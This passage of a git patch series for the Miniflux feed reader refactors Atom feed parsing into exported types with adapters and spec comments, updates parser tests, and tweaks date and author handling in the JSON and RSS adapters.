+ // identifies an image that provides iconic visual identification for a
+ // feed.
+ //
+ // atom:feed elements MUST NOT contain more than one atom:icon element.
+ Icon string `xml:"http://www.w3.org/2005/Atom icon"`
+
+ // The "atom:logo" element's content is an IRI reference [RFC3987] that
+ // identifies an image that provides visual identification for a feed.
+ //
+ // atom:feed elements MUST NOT contain more than one atom:logo element.
+ Logo string `xml:"http://www.w3.org/2005/Atom logo"`
+
+ // atom:feed elements SHOULD contain one atom:link element with a rel
+ // attribute value of "self". This is the preferred URI for
+ // retrieving Atom Feed Documents representing this Atom feed.
+ //
+ // atom:feed elements MUST NOT contain more than one atom:link
+ // element with a rel attribute value of "alternate" that has the
+ // same combination of type and hreflang attribute values.
+ Links AtomLinks `xml:"http://www.w3.org/2005/Atom link"`
+
+ // The "atom:category" element conveys information about a category
+ // associated with an entry or feed. This specification assigns no
+ // meaning to the content (if any) of this element.
+ //
+ // atom:feed elements MAY contain any number of atom:category
+ // elements.
+ Categories AtomCategories `xml:"http://www.w3.org/2005/Atom category"`
+
+ Entries []Atom10Entry `xml:"http://www.w3.org/2005/Atom entry"`
}
-func (a *atom10Feed) Transform(baseURL string) *model.Feed {
- var err error
+type Atom10Entry struct {
+ // The "atom:id" element conveys a permanent, universally unique
+ // identifier for an entry or feed.
+ //
+ // Its content MUST be an IRI, as defined by [RFC3987]. Note that the
+ // definition of "IRI" excludes relative references. Though the IRI
+ // might use a dereferencable scheme, Atom Processors MUST NOT assume it
+ // can be dereferenced.
+ //
+ // atom:entry elements MUST contain exactly one atom:id element.
+ ID string `xml:"http://www.w3.org/2005/Atom id"`
- feed := new(model.Feed)
+ // The "atom:title" element is a Text construct that conveys a human-
+ // readable title for an entry or feed.
+ //
+ // atom:entry elements MUST contain exactly one atom:title element.
+ Title Atom10Text `xml:"http://www.w3.org/2005/Atom title"`
- feedURL := a.Links.firstLinkWithRelation("self")
- feed.FeedURL, err = urllib.AbsoluteURL(baseURL, feedURL)
- if err != nil {
- feed.FeedURL = feedURL
- }
+ // The "atom:published" element is a Date construct indicating an
+ // instant in time associated with an event early in the life cycle of
+ // the entry.
+ Published string `xml:"http://www.w3.org/2005/Atom published"`
- siteURL := a.Links.originalLink()
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, siteURL)
- if err != nil {
- feed.SiteURL = siteURL
- }
+ // The "atom:updated" element is a Date construct indicating the most
+ // recent instant in time when an entry or feed was modified in a way
+ // the publisher considers significant. Therefore, not all
+ // modifications necessarily result in a changed atom:updated value.
+ //
+ // atom:entry elements MUST contain exactly one atom:updated element.
+ Updated string `xml:"http://www.w3.org/2005/Atom updated"`
- feed.Title = html.UnescapeString(a.Title.String())
- if feed.Title == "" {
- feed.Title = feed.SiteURL
- }
+ // atom:entry elements MUST NOT contain more than one atom:link
+ // element with a rel attribute value of "alternate" that has the
+ // same combination of type and hreflang attribute values.
+ Links AtomLinks `xml:"http://www.w3.org/2005/Atom link"`
- feed.IconURL = strings.TrimSpace(a.Icon)
+ // atom:entry elements MUST contain an atom:summary element in either
+ // of the following cases:
+ // * the atom:entry contains an atom:content that has a "src"
+ // attribute (and is thus empty).
+ // * the atom:entry contains content that is encoded in Base64;
+ // i.e., the "type" attribute of atom:content is a MIME media type
+ // [MIMEREG], but is not an XML media type [RFC3023], does not
+ // begin with "text/", and does not end with "/xml" or "+xml".
+ //
+ // atom:entry elements MUST NOT contain more than one atom:summary
+ // element.
+ Summary Atom10Text `xml:"http://www.w3.org/2005/Atom summary"`
- for _, entry := range a.Entries {
- item := entry.Transform()
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, item.URL)
- if err == nil {
- item.URL = entryURL
- }
+ // atom:entry elements MUST NOT contain more than one atom:content
+ // element.
+ Content Atom10Text `xml:"http://www.w3.org/2005/Atom content"`
- if item.Author == "" {
- item.Author = a.Authors.String()
- }
+ // The "atom:author" element is a Person construct that indicates the
+ // author of the entry or feed.
+ //
+ // atom:entry elements MUST contain one or more atom:author elements
+ Authors AtomPersons `xml:"http://www.w3.org/2005/Atom author"`
- if item.Title == "" {
- item.Title = sanitizer.TruncateHTML(item.Content, 100)
- }
+ // The "atom:category" element conveys information about a category
+ // associated with an entry or feed. This specification assigns no
+ // meaning to the content (if any) of this element.
+ //
+ // atom:entry elements MAY contain any number of atom:category
+ // elements.
+ Categories AtomCategories `xml:"http://www.w3.org/2005/Atom category"`
- if item.Title == "" {
- item.Title = item.URL
- }
-
- feed.Entries = append(feed.Entries, item)
- }
-
- return feed
-}
-
-type atom10Entry struct {
- ID string `xml:"id"`
- Title atom10Text `xml:"title"`
- Published string `xml:"published"`
- Updated string `xml:"updated"`
- Links atomLinks `xml:"link"`
- Summary atom10Text `xml:"summary"`
- Content atom10Text `xml:"http://www.w3.org/2005/Atom content"`
- Authors atomAuthors `xml:"author"`
- Categories []atom10Category `xml:"category"`
media.MediaItemElement
}
-func (a *atom10Entry) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.URL = a.Links.originalLink()
- entry.Date = a.entryDate()
- entry.Author = a.Authors.String()
- entry.Hash = a.entryHash()
- entry.Content = a.entryContent()
- entry.Title = a.entryTitle()
- entry.Enclosures = a.entryEnclosures()
- entry.CommentsURL = a.entryCommentsURL()
- entry.Tags = a.entryCategories()
- return entry
-}
-
-func (a *atom10Entry) entryTitle() string {
- return html.UnescapeString(a.Title.String())
-}
-
-func (a *atom10Entry) entryContent() string {
- content := a.Content.String()
- if content != "" {
- return content
- }
-
- summary := a.Summary.String()
- if summary != "" {
- return summary
- }
-
- mediaDescription := a.FirstMediaDescription()
- if mediaDescription != "" {
- return mediaDescription
- }
-
- return ""
-}
-
-// Note: The published date represents the original creation date for YouTube feeds.
-// Example:
-// 2019-01-26T08:02:28+00:00
-// 2019-01-29T07:27:27+00:00
-func (a *atom10Entry) entryDate() time.Time {
- dateText := a.Published
- if dateText == "" {
- dateText = a.Updated
- }
-
- if dateText != "" {
- result, err := date.Parse(dateText)
- if err != nil {
- slog.Debug("Unable to parse date from Atom 0.3 feed",
- slog.String("date", dateText),
- slog.String("id", a.ID),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return result
- }
-
- return time.Now()
-}
-
-func (a *atom10Entry) entryHash() string {
- for _, value := range []string{a.ID, a.Links.originalLink()} {
- if value != "" {
- return crypto.Hash(value)
- }
- }
-
- return ""
-}
-
-func (a *atom10Entry) entryEnclosures() model.EnclosureList {
- enclosures := make(model.EnclosureList, 0)
- duplicates := make(map[string]bool)
-
- for _, mediaThumbnail := range a.AllMediaThumbnails() {
- if _, found := duplicates[mediaThumbnail.URL]; !found {
- duplicates[mediaThumbnail.URL] = true
- enclosures = append(enclosures, &model.Enclosure{
- URL: mediaThumbnail.URL,
- MimeType: mediaThumbnail.MimeType(),
- Size: mediaThumbnail.Size(),
- })
- }
- }
-
- for _, link := range a.Links {
- if strings.EqualFold(link.Rel, "enclosure") {
- if link.URL == "" {
- continue
- }
-
- if _, found := duplicates[link.URL]; !found {
- duplicates[link.URL] = true
- length, _ := strconv.ParseInt(link.Length, 10, 0)
- enclosures = append(enclosures, &model.Enclosure{URL: link.URL, MimeType: link.Type, Size: length})
- }
- }
- }
-
- for _, mediaContent := range a.AllMediaContents() {
- if _, found := duplicates[mediaContent.URL]; !found {
- duplicates[mediaContent.URL] = true
- enclosures = append(enclosures, &model.Enclosure{
- URL: mediaContent.URL,
- MimeType: mediaContent.MimeType(),
- Size: mediaContent.Size(),
- })
- }
- }
-
- for _, mediaPeerLink := range a.AllMediaPeerLinks() {
- if _, found := duplicates[mediaPeerLink.URL]; !found {
- duplicates[mediaPeerLink.URL] = true
- enclosures = append(enclosures, &model.Enclosure{
- URL: mediaPeerLink.URL,
- MimeType: mediaPeerLink.MimeType(),
- Size: mediaPeerLink.Size(),
- })
- }
- }
-
- return enclosures
-}
-
-func (r *atom10Entry) entryCategories() []string {
- categoryList := make([]string, 0)
-
- for _, atomCategory := range r.Categories {
- if strings.TrimSpace(atomCategory.Label) != "" {
- categoryList = append(categoryList, strings.TrimSpace(atomCategory.Label))
- } else {
- categoryList = append(categoryList, strings.TrimSpace(atomCategory.Term))
- }
- }
-
- return categoryList
-}
-
-// See https://tools.ietf.org/html/rfc4685#section-4
-// If the type attribute of the atom:link is omitted, its value is assumed to be "application/atom+xml".
-// We accept only HTML or XHTML documents for now since the intention is to have the same behavior as RSS.
-func (a *atom10Entry) entryCommentsURL() string {
- commentsURL := a.Links.firstLinkWithRelationAndType("replies", "text/html", "application/xhtml+xml")
- if urllib.IsAbsoluteURL(commentsURL) {
- return commentsURL
- }
- return ""
-}
-
-type atom10Text struct {
- Type string `xml:"type,attr"`
- CharData string `xml:",chardata"`
- InnerXML string `xml:",innerxml"`
- XHTMLRootElement atomXHTMLRootElement `xml:"http://www.w3.org/1999/xhtml div"`
-}
-
-type atom10Category struct {
- Term string `xml:"term,attr"`
- Label string `xml:"label,attr"`
-}
-
+// A Text construct contains human-readable text, usually in small
+// quantities. The content of Text constructs is Language-Sensitive.
+// Specs: https://datatracker.ietf.org/doc/html/rfc4287#section-3.1
// Text: https://datatracker.ietf.org/doc/html/rfc4287#section-3.1.1.1
// HTML: https://datatracker.ietf.org/doc/html/rfc4287#section-3.1.1.2
// XHTML: https://datatracker.ietf.org/doc/html/rfc4287#section-3.1.1.3
-func (a *atom10Text) String() string {
+type Atom10Text struct {
+ Type string `xml:"type,attr"`
+ CharData string `xml:",chardata"`
+ InnerXML string `xml:",innerxml"`
+ XHTMLRootElement AtomXHTMLRootElement `xml:"http://www.w3.org/1999/xhtml div"`
+}
+
+func (a *Atom10Text) Body() string {
var content string
- switch {
- case a.Type == "", a.Type == "text", a.Type == "text/plain":
- if strings.HasPrefix(strings.TrimSpace(a.InnerXML), ` 0 {
+ categories = slices.Compact(categories)
+ sort.Strings(categories)
+ entry.Tags = categories
+ }
+
+ // Populate the commentsURL if defined.
+ // See https://tools.ietf.org/html/rfc4685#section-4
+ // If the type attribute of the atom:link is omitted, its value is assumed to be "application/atom+xml".
+ // We accept only HTML or XHTML documents for now since the intention is to have the same behavior as RSS.
+ commentsURL := atomEntry.Links.firstLinkWithRelationAndType("replies", "text/html", "application/xhtml+xml")
+ if urllib.IsAbsoluteURL(commentsURL) {
+ entry.CommentsURL = commentsURL
+ }
+
+ // Generate the entry hash.
+ for _, value := range []string{atomEntry.ID, atomEntry.Links.OriginalLink()} {
+ if value != "" {
+ entry.Hash = crypto.Hash(value)
+ break
+ }
+ }
+
+ // Populate the entry enclosures.
+ uniqueEnclosuresMap := make(map[string]bool)
+
+ for _, mediaThumbnail := range atomEntry.AllMediaThumbnails() {
+ if _, found := uniqueEnclosuresMap[mediaThumbnail.URL]; !found {
+ uniqueEnclosuresMap[mediaThumbnail.URL] = true
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: mediaThumbnail.URL,
+ MimeType: mediaThumbnail.MimeType(),
+ Size: mediaThumbnail.Size(),
+ })
+ }
+ }
+
+ for _, link := range atomEntry.Links {
+ if strings.EqualFold(link.Rel, "enclosure") {
+ if link.Href == "" {
+ continue
+ }
+
+ if _, found := uniqueEnclosuresMap[link.Href]; !found {
+ uniqueEnclosuresMap[link.Href] = true
+ length, _ := strconv.ParseInt(link.Length, 10, 0)
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: link.Href,
+ MimeType: link.Type,
+ Size: length,
+ })
+ }
+ }
+ }
+
+ for _, mediaContent := range atomEntry.AllMediaContents() {
+ if _, found := uniqueEnclosuresMap[mediaContent.URL]; !found {
+ uniqueEnclosuresMap[mediaContent.URL] = true
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: mediaContent.URL,
+ MimeType: mediaContent.MimeType(),
+ Size: mediaContent.Size(),
+ })
+ }
+ }
+
+ for _, mediaPeerLink := range atomEntry.AllMediaPeerLinks() {
+ if _, found := uniqueEnclosuresMap[mediaPeerLink.URL]; !found {
+ uniqueEnclosuresMap[mediaPeerLink.URL] = true
+ entry.Enclosures = append(entry.Enclosures, &model.Enclosure{
+ URL: mediaPeerLink.URL,
+ MimeType: mediaPeerLink.MimeType(),
+ Size: mediaPeerLink.Size(),
+ })
+ }
+ }
+
+ feed.Entries = append(feed.Entries, entry)
+ }
+
+ return feed
+}
diff --git a/internal/reader/atom/atom_10_test.go b/internal/reader/atom/atom_10_test.go
index f778e8e6..be6e9148 100644
--- a/internal/reader/atom/atom_10_test.go
+++ b/internal/reader/atom/atom_10_test.go
@@ -12,7 +12,6 @@ import (
func TestParseAtomSample(t *testing.T) {
data := `
-
Example Feed2003-12-13T18:30:02Z
@@ -20,7 +19,6 @@ func TestParseAtomSample(t *testing.T) {
John Doeurn:uuid:60a76c80-d399-11d9-b93C-0003939e0af6
-
Atom-Powered Robots Run Amok
@@ -28,7 +26,6 @@ func TestParseAtomSample(t *testing.T) {
2003-12-13T18:30:02ZSome text.
-
`
feed, err := Parse("http://example.org/feed.xml", bytes.NewReader([]byte(data)), "10")
@@ -420,7 +417,7 @@ func TestParseEntryWithPlainTextTitle(t *testing.T) {
expected := `AT&T bought by SBC!`
for i := range 2 {
if feed.Entries[i].Title != expected {
- t.Errorf("Incorrect title for entry #%d, got: %q", i, feed.Entries[i].Title)
+ t.Errorf("Incorrect title for entry #%d, got: %q instead of %q", i, feed.Entries[i].Title, expected)
}
}
}
@@ -430,33 +427,20 @@ func TestParseEntryWithHTMLTitle(t *testing.T) {
Example Feed
-
- <code>Test</code> Test
-
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- Some text.
+ <code>Code</code> Test
+
-
-
-
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- Some text.
+
+
-
-
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- Some text.
+
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -464,11 +448,11 @@ func TestParseEntryWithHTMLTitle(t *testing.T) {
t.Fatal(err)
}
- if feed.Entries[0].Title != "Test Test" {
+ if feed.Entries[0].Title != "Code Test" {
t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
}
- if feed.Entries[1].Title != "Test “Test”" {
+ if feed.Entries[1].Title != "Test with “unicode quote”" {
t.Errorf("Incorrect entry title, got: %q", feed.Entries[1].Title)
}
@@ -502,8 +486,8 @@ func TestParseEntryWithXHTMLTitle(t *testing.T) {
t.Fatal(err)
}
- if feed.Entries[0].Title != `This is XHTML content.` {
- t.Errorf("Incorrect entry title, got: %q", feed.Entries[1].Title)
+ if feed.Entries[0].Title != `This is XHTML content.` {
+ t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
}
}
@@ -608,7 +592,7 @@ func TestParseEntryWithDoubleEncodedEntitiesTitle(t *testing.T) {
t.Fatal(err)
}
- if feed.Entries[0].Title != `'AT&T'` {
+ if feed.Entries[0].Title != `'AT&T'` {
t.Errorf("Incorrect entry title, got: %q", feed.Entries[0].Title)
}
}
@@ -644,31 +628,21 @@ func TestParseEntryWithHTMLSummary(t *testing.T) {
Example Feed
-
- Example
+ Example 1
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- <code>std::unique_ptr<S></code>
+ <code>std::unique_ptr<S> myvar;</code>
-
- Example
+ Example 2
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- <code>std::unique_ptr<S></code>
+ <code>std::unique_ptr<S> myvar;</code>
-
- Example
+ Example 3
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
- 2003-12-13T18:30:02Z
- std::unique_ptr<S>]]>
+ std::unique_ptr<S> myvar;]]>
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -676,7 +650,11 @@ func TestParseEntryWithHTMLSummary(t *testing.T) {
t.Fatal(err)
}
- expected := `std::unique_ptr<S>`
+ if len(feed.Entries) != 3 {
+ t.Fatalf("Incorrect number of entries, got: %d", len(feed.Entries))
+ }
+
+ expected := `std::unique_ptr<S> myvar;`
for i := range 3 {
if feed.Entries[i].Content != expected {
t.Errorf("Incorrect content for entry #%d, got: %q", i, feed.Entries[i].Content)
@@ -728,7 +706,7 @@ func TestParseEntryWithTextSummary(t *testing.T) {
t.Fatal(err)
}
- expected := `AT&T <S>`
+ expected := `AT&T `
for i := range 4 {
if feed.Entries[i].Content != expected {
t.Errorf("Incorrect content for entry #%d, got: %q", i, feed.Entries[i].Content)
@@ -747,7 +725,7 @@ func TestParseEntryWithTextContent(t *testing.T) {
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02Z
- AT&T <S>
+ AT&T <strong>Strong Element</strong>
@@ -755,7 +733,7 @@ func TestParseEntryWithTextContent(t *testing.T) {
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02Z
- AT&T <S>
+ AT&T <strong>Strong Element</strong>
@@ -763,7 +741,7 @@ func TestParseEntryWithTextContent(t *testing.T) {
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02Z
- AT&T <S>
+ AT&T <strong>Strong Element</strong>
@@ -771,7 +749,7 @@ func TestParseEntryWithTextContent(t *testing.T) {
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02Z
- ]]>
+ Strong Element]]>`
@@ -781,10 +759,10 @@ func TestParseEntryWithTextContent(t *testing.T) {
t.Fatal(err)
}
- expected := `AT&T <S>`
+ expected := `AT&T Strong Element`
for i := range 4 {
if feed.Entries[i].Content != expected {
- t.Errorf("Incorrect content for entry #%d, got: %q", i, feed.Entries[i].Content)
+ t.Errorf("Incorrect content for entry #%d, got: %q instead of %q", i, feed.Entries[i].Content, expected)
}
}
}
@@ -925,7 +903,6 @@ func TestParseEntryWithMultipleAuthors(t *testing.T) {
Example Feed
-
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
@@ -938,7 +915,6 @@ func TestParseEntryWithMultipleAuthors(t *testing.T) {
Bob
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -951,7 +927,7 @@ func TestParseEntryWithMultipleAuthors(t *testing.T) {
}
}
-func TestParseEntryWithoutAuthor(t *testing.T) {
+func TestParseFeedWithEntryWithoutAuthor(t *testing.T) {
data := `
Example Feed
@@ -959,14 +935,12 @@ func TestParseEntryWithoutAuthor(t *testing.T) {
John Doe
-
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02ZSome text.
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -990,14 +964,15 @@ func TestParseFeedWithMultipleAuthors(t *testing.T) {
Bob
-
+
+ Bob
+ urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02ZSome text.
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -1015,14 +990,12 @@ func TestParseFeedWithoutAuthor(t *testing.T) {
Example Feed
-
urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a2003-12-13T18:30:02ZSome text.
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -1608,27 +1581,18 @@ func TestAbsoluteCommentsURL(t *testing.T) {
}
}
-func TestParseFeedWithCategories(t *testing.T) {
+func TestParseItemWithCategories(t *testing.T) {
data := `
Example Feed
-
- Alice
-
-
- Bob
-
-
-
- urn:uuid:1225c695-cfb8-4ebb-aaaa-80da344efa6a
+
2003-12-13T18:30:02ZSome text.
-
+
-
`
feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
@@ -1637,22 +1601,53 @@ func TestParseFeedWithCategories(t *testing.T) {
}
if len(feed.Entries[0].Tags) != 2 {
- t.Errorf("Incorrect number of tags, got: %d", len(feed.Entries[0].Tags))
+ t.Fatalf("Incorrect number of tags, got: %d", len(feed.Entries[0].Tags))
}
- expected := "Tech"
+ expected := "Science"
result := feed.Entries[0].Tags[0]
if result != expected {
t.Errorf("Incorrect entry category, got %q instead of %q", result, expected)
}
- expected = "Science"
+ expected = "ZZZZ"
result = feed.Entries[0].Tags[1]
if result != expected {
t.Errorf("Incorrect entry category, got %q instead of %q", result, expected)
}
}
+func TestParseFeedWithCategories(t *testing.T) {
+ data := `
+
+ Example Feed
+
+
+
+
+
+
+ 2003-12-13T18:30:02Z
+ Some text.
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)), "10")
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries[0].Tags) != 1 {
+ t.Fatalf("Incorrect number of tags, got: %d", len(feed.Entries[0].Tags))
+ }
+
+ expected := "Some Label"
+ result := feed.Entries[0].Tags[0]
+ if result != expected {
+ t.Errorf("Incorrect entry category, got %q instead of %q", result, expected)
+ }
+}
+
func TestParseFeedWithIconURL(t *testing.T) {
data := `
diff --git a/internal/reader/atom/atom_common.go b/internal/reader/atom/atom_common.go
index 4b283d44..debd46f1 100644
--- a/internal/reader/atom/atom_common.go
+++ b/internal/reader/atom/atom_common.go
@@ -3,77 +3,91 @@
package atom // import "miniflux.app/v2/internal/reader/atom"
-import "strings"
+import (
+ "strings"
+)
-type atomPerson struct {
- Name string `xml:"name"`
+// Specs: https://datatracker.ietf.org/doc/html/rfc4287#section-3.2
+type AtomPerson struct {
+ // The "atom:name" element's content conveys a human-readable name for the author.
+ // It MAY be the name of a corporation or other entity no individual authors can be named.
+ // Person constructs MUST contain exactly one "atom:name" element, whose content MUST be a string.
+ Name string `xml:"name"`
+
+ // The "atom:email" element's content conveys an e-mail address associated with the Person construct.
+ // Person constructs MAY contain an atom:email element, but MUST NOT contain more than one.
+ // Its content MUST be an e-mail address [RFC2822].
+ // Ordering of the element children of Person constructs MUST NOT be considered significant.
Email string `xml:"email"`
}
-func (a *atomPerson) String() string {
- name := ""
-
- switch {
- case a.Name != "":
- name = a.Name
- case a.Email != "":
- name = a.Email
+func (a *AtomPerson) PersonName() string {
+ name := strings.TrimSpace(a.Name)
+ if name != "" {
+ return name
}
- return strings.TrimSpace(name)
+ return strings.TrimSpace(a.Email)
}
-type atomAuthors []*atomPerson
+type AtomPersons []*AtomPerson
-func (a atomAuthors) String() string {
- var authors []string
+func (a AtomPersons) PersonNames() []string {
+ var names []string
+ authorNamesMap := make(map[string]bool)
for _, person := range a {
- authors = append(authors, person.String())
+ personName := person.PersonName()
+ if _, ok := authorNamesMap[personName]; !ok {
+ names = append(names, personName)
+ authorNamesMap[personName] = true
+ }
}
- return strings.Join(authors, ", ")
+ return names
}
-type atomLink struct {
- URL string `xml:"href,attr"`
+// Specs: https://datatracker.ietf.org/doc/html/rfc4287#section-4.2.7
+type AtomLink struct {
+ Href string `xml:"href,attr"`
Type string `xml:"type,attr"`
Rel string `xml:"rel,attr"`
Length string `xml:"length,attr"`
+ Title string `xml:"title,attr"`
}
-type atomLinks []*atomLink
+type AtomLinks []*AtomLink
-func (a atomLinks) originalLink() string {
+func (a AtomLinks) OriginalLink() string {
for _, link := range a {
if strings.EqualFold(link.Rel, "alternate") {
- return strings.TrimSpace(link.URL)
+ return strings.TrimSpace(link.Href)
}
if link.Rel == "" && (link.Type == "" || link.Type == "text/html") {
- return strings.TrimSpace(link.URL)
+ return strings.TrimSpace(link.Href)
}
}
return ""
}
-func (a atomLinks) firstLinkWithRelation(relation string) string {
+func (a AtomLinks) firstLinkWithRelation(relation string) string {
for _, link := range a {
if strings.EqualFold(link.Rel, relation) {
- return strings.TrimSpace(link.URL)
+ return strings.TrimSpace(link.Href)
}
}
return ""
}
-func (a atomLinks) firstLinkWithRelationAndType(relation string, contentTypes ...string) string {
+func (a AtomLinks) firstLinkWithRelationAndType(relation string, contentTypes ...string) string {
for _, link := range a {
if strings.EqualFold(link.Rel, relation) {
for _, contentType := range contentTypes {
if strings.EqualFold(link.Type, contentType) {
- return strings.TrimSpace(link.URL)
+ return strings.TrimSpace(link.Href)
}
}
}
@@ -81,3 +95,46 @@ func (a atomLinks) firstLinkWithRelationAndType(relation string, contentTypes ..
return ""
}
+
+// The "atom:category" element conveys information about a category
+// associated with an entry or feed. This specification assigns no
+// meaning to the content (if any) of this element.
+//
+// Specs: https://datatracker.ietf.org/doc/html/rfc4287#section-4.2.2
+type AtomCategory struct {
+ // The "term" attribute is a string that identifies the category to
+ // which the entry or feed belongs. Category elements MUST have a
+ // "term" attribute.
+ Term string `xml:"term,attr"`
+
+ // The "scheme" attribute is an IRI that identifies a categorization
+ // scheme. Category elements MAY have a "scheme" attribute.
+ Scheme string `xml:"scheme,attr"`
+
+ // The "label" attribute provides a human-readable label for display in
+ // end-user applications. The content of the "label" attribute is
+ // Language-Sensitive. Entities such as "&" and "<" represent
+ // their corresponding characters ("&" and "<", respectively), not
+ // markup. Category elements MAY have a "label" attribute.
+ Label string `xml:"label,attr"`
+}
+
+type AtomCategories []AtomCategory
+
+func (ac AtomCategories) CategoryNames() []string {
+ var categories []string
+
+ for _, category := range ac {
+ label := strings.TrimSpace(category.Label)
+ if label != "" {
+ categories = append(categories, label)
+ } else {
+ term := strings.TrimSpace(category.Term)
+ if term != "" {
+ categories = append(categories, term)
+ }
+ }
+ }
+
+ return categories
+}
diff --git a/internal/reader/atom/parser.go b/internal/reader/atom/parser.go
index 55c17ee5..f97985bc 100644
--- a/internal/reader/atom/parser.go
+++ b/internal/reader/atom/parser.go
@@ -11,22 +11,20 @@ import (
xml_decoder "miniflux.app/v2/internal/reader/xml"
)
-type atomFeed interface {
- Transform(baseURL string) *model.Feed
-}
-
// Parse returns a normalized feed struct from a Atom feed.
func Parse(baseURL string, r io.ReadSeeker, version string) (*model.Feed, error) {
- var rawFeed atomFeed
- if version == "0.3" {
- rawFeed = new(atom03Feed)
- } else {
- rawFeed = new(atom10Feed)
+ switch version {
+ case "0.3":
+ atomFeed := new(Atom03Feed)
+ if err := xml_decoder.NewXMLDecoder(r).Decode(atomFeed); err != nil {
+ return nil, fmt.Errorf("atom: unable to parse Atom 0.3 feed: %w", err)
+ }
+ return NewAtom03Adapter(atomFeed).BuildFeed(baseURL), nil
+ default:
+ atomFeed := new(Atom10Feed)
+ if err := xml_decoder.NewXMLDecoder(r).Decode(atomFeed); err != nil {
+ return nil, fmt.Errorf("atom: unable to parse Atom 1.0 feed: %w", err)
+ }
+ return NewAtom10Adapter(atomFeed).BuildFeed(baseURL), nil
}
-
- if err := xml_decoder.NewXMLDecoder(r).Decode(rawFeed); err != nil {
- return nil, fmt.Errorf("atom: unable to parse feed: %w", err)
- }
-
- return rawFeed.Transform(baseURL), nil
}
diff --git a/internal/reader/json/adapter.go b/internal/reader/json/adapter.go
index d62ff976..9e577d3e 100644
--- a/internal/reader/json/adapter.go
+++ b/internal/reader/json/adapter.go
@@ -98,7 +98,6 @@ func (j *JSONAdapter) BuildFeed(feedURL string) *model.Feed {
}
// Populate the entry date.
- entry.Date = time.Now()
for _, value := range []string{item.DatePublished, item.DateModified} {
value = strings.TrimSpace(value)
if value != "" {
@@ -114,6 +113,9 @@ func (j *JSONAdapter) BuildFeed(feedURL string) *model.Feed {
}
}
}
+ if entry.Date.IsZero() {
+ entry.Date = time.Now()
+ }
// Populate the entry author.
itemAuthors := append(item.Authors, j.jsonFeed.Authors...)
diff --git a/internal/reader/parser/parser_test.go b/internal/reader/parser/parser_test.go
index 447f73d3..9ab55a0c 100644
--- a/internal/reader/parser/parser_test.go
+++ b/internal/reader/parser/parser_test.go
@@ -85,7 +85,35 @@ func FuzzParse(f *testing.F) {
})
}
-func TestParseAtom(t *testing.T) {
+func TestParseAtom03Feed(t *testing.T) {
+ data := `
+
+ dive into mark
+
+ 2003-12-13T18:30:02Z
+ Mark Pilgrim
+
+ Atom 0.3 snapshot
+
+ tag:diveintomark.org,2003:3.2397
+ 2003-12-13T08:29:29-04:00
+ 2003-12-13T18:30:02Z
+ It's a test
+ HTML content]]>
+
+ `
+
+ feed, err := ParseFeed("https://example.org/", strings.NewReader(data))
+ if err != nil {
+ t.Error(err)
+ }
+
+ if feed.Title != "dive into mark" {
+ t.Errorf("Incorrect title, got: %s", feed.Title)
+ }
+}
+
+func TestParseAtom10Feed(t *testing.T) {
data := `
diff --git a/internal/reader/rss/adapter.go b/internal/reader/rss/adapter.go
index fe1eed80..2909fc6b 100644
--- a/internal/reader/rss/adapter.go
+++ b/internal/reader/rss/adapter.go
@@ -69,7 +69,6 @@ func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
for _, item := range r.rss.Channel.Items {
entry := model.NewEntry()
- entry.Author = findEntryAuthor(&item)
entry.Date = findEntryDate(&item)
entry.Content = findEntryContent(&item)
entry.Enclosures = findEntryEnclosures(&item)
@@ -91,11 +90,11 @@ func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
if entry.Title == "" {
entry.Title = sanitizer.TruncateHTML(entry.Content, 100)
}
-
if entry.Title == "" {
entry.Title = entry.URL
}
+ entry.Author = findEntryAuthor(&item)
if entry.Author == "" {
entry.Author = findFeedAuthor(&r.rss.Channel)
}
From 4834e934f2cf57b106923bd37d62d6c5f6f39f1f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Fri, 15 Mar 2024 18:04:24 -0700
Subject: [PATCH 19/80] Remove some duplicated code in RSS parser
---
internal/reader/rss/adapter.go | 10 +-
internal/reader/rss/atom.go | 37 ++------
internal/reader/rss/parser_test.go | 100 ++++++++++++++++++++
